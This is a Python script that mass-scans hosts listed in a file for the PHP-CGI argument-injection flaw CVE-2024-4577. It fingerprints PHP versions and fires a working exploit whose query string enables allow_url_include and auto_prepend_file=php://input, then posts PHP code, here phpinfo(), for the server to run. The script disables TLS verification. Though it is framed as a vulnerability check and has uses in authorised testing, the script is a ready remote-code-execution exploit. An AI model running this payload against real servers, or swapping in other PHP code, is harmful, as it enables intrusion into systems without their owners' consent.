import requests
from urllib.parse import urlparse
import re
def send_request(url: str, method: str, data: str, timeout: int=5) -> requests.models.Response:
    """Issue one HTTP request and return the response, or ``None`` on failure.

    Only ``'GET'`` and ``'POST'`` are supported; any other *method* returns
    ``None`` without sending anything. *data* is forwarded as the POST body
    and ignored for GET. Timeouts and connection errors are swallowed and
    reported as ``None``; every other ``requests`` exception propagates to
    the caller.

    Note that every request is sent with ``verify=False``, so TLS
    certificate validation is disabled for this function's traffic.
    """
    senders = {
        'GET': lambda: requests.get(url, timeout=timeout, verify=False),
        'POST': lambda: requests.post(url, data=data, timeout=timeout, verify=False),
    }
    sender = senders.get(method)
    if sender is None:
        return None
    try:
        return sender()
    except (requests.exceptions.Timeout, requests.exceptions.ConnectionError):
        return None
def check_connectivity(url: str) -> bool:
    """Return ``True`` when a GET to *url* yielded any response object.

    Delegates to ``send_request``, so a timeout or connection error counts
    as "not connected"; an HTTP error status still counts as connected.
    """
    return send_request(url, 'GET', '') is not None
def check_cgi_exist(url: str) -> bool:
    """Report whether ``/php-cgi/php-cgi.exe`` under *url* answers with HTTP 500.

    A 500 status is what this script treats as "the CGI binary is present".
    No response (``None`` from ``send_request``) or any other status code is
    reported as ``False``.
    """
    response = send_request(url + "/php-cgi/php-cgi.exe", 'GET', '')
    return response is not None and response.status_code == 500
def get_phpversion(url: str) -> str:
    """Collect PHP version hints exposed by ``/php-cgi/php-cgi.exe`` under *url*.

    The result concatenates, in order: the ``X-Powered-By`` header plus a
    trailing space (only when it mentions ``PHP``), the ``Server`` header
    plus a trailing space (same condition), and every ``PHP/x.y.z`` token
    found in the response body. Returns ``''`` when no response came back.
    """
    response = send_request(url + "/php-cgi/php-cgi.exe", 'GET', '')
    if response is None:
        return ''
    fragments = []
    # Both headers are handled identically: keep them only if they name PHP.
    for header_name in ('X-Powered-By', 'Server'):
        header_value = response.headers.get(header_name)
        if header_value and 'PHP' in header_value:
            fragments.append(header_value + ' ')
    fragments.extend(re.findall(r'PHP\/\d*\.\d*\.\d*', response.text))
    return ''.join(fragments)
def exploit(url: str) -> bool:
    """Send the CVE-2024-4577 probe to *url* and report whether it succeeded.

    Success is inferred from the response body containing a
    ``PHP Version x.y.z`` string, i.e. the ``phpinfo()`` output the POST
    body asks for. ``False`` is returned when no response was obtained.
    """
    res = send_request(url + "/php-cgi/php-cgi.exe" +
                       "?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input",
                       method='POST', data="<?php phpinfo();?>")
    if res is None:
        return False
    # The status code is not consulted; only the phpinfo() banner decides.
    version_text = re.findall(r'PHP Version \d*\.\d*\.\d*', res.text)
    return len(version_text) > 0
def header():
    """Print the banner naming the CVE under test and the affected version ranges."""
    banner_lines = (
        'Testing CVE-2024-4577',
        'vulnerable version: 5.0.0 - 8.1.28, 8.2.0 - 8.2.19, 8.3.0 - 8.3.7',
    )
    for line in banner_lines:
        print(line)
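def main():
    """Run every check against each target listed in ``urls.txt``.

    Each line is a host or URL. Blank lines and lines equal to ``'None'``
    are skipped, a missing scheme defaults to ``http://``, and only
    ``scheme://netloc`` is kept. For reachable targets the CGI presence,
    version hints and probe result are gathered; unreachable ones show
    ``'?'`` for all three. One summary line is printed per target, coloured
    red where a check came back positive and yellow when unreachable.
    """
    COLOR_RED = '\033[0;31m'
    COLOR_YELLOW = '\033[0;33m'
    COLOR_CLEAN = '\033[0m'
    # Read the target list under a context manager so the handle is closed
    # before the (potentially long) network phase begins.
    with open('urls.txt', 'r') as url_file:
        urls = url_file.readlines()
    for url in urls:
        url = url.strip()
        # An empty line would otherwise become the invalid URL 'http://'.
        if not url or url == 'None':
            continue
        if not url.startswith('http'):
            url = 'http://' + url
        urlinfo = urlparse(url)
        url = urlinfo.scheme + '://' + urlinfo.netloc
        cgi_exist = '?'
        phpversion = '?'
        exp_result = '?'
        connected = check_connectivity(url)
        if connected:
            cgi_exist = check_cgi_exist(url)
            phpversion = get_phpversion(url)
            exp_result = exploit(url)
        print(f'Testing: {url}' +
              f' {COLOR_YELLOW if not connected else COLOR_CLEAN}{connected=}{COLOR_CLEAN}' +
              f' {COLOR_RED if cgi_exist is True else COLOR_CLEAN}{cgi_exist=}{COLOR_CLEAN}' +
              f' {phpversion=}' +
              f' {COLOR_RED if exp_result is True else COLOR_CLEAN}{exp_result=}{COLOR_CLEAN}'
              )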
if __name__ == '__main__':
    # Banner first, then the per-target run; neither executes on import.
    header()
    main()